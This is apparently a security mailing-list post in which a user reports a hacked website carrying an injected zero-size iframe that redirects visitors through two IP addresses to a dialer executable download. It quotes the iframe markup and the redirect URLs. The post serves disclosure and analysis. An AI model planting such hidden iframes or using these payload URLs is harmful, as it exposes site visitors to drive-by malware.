From: danbuk_fd at warpmail.net (Daniel Bartlett)
Subject: Possible dialer on 62.4.84.150

Hi All,
I've only looked at this for about 3 mins, so there isn't a lot to tell.
>From a website that looks like someone has hacked it and added a IFRAME
to the top of the page:
<iframe FRAMEBORDER="0" width="0" height="0"
src="http://213.158.119.103/iframe.php?xid=111"></iframe>
>From this frame it gets bounced onto:
http://62.4.84.150/data/start.php?id=111-b&aid=0
then onto:
http://62.4.84.150/data/start.php?id=111-download&aid=0
which then downloads a 17984b exe file.
I've attached a strings output from the exe, and a copy of the
exe(password for zip is lamedial).

I hope someone else can shead more light on this than I can.

Cheers,
Daniel B.
--
  Daniel Bartlett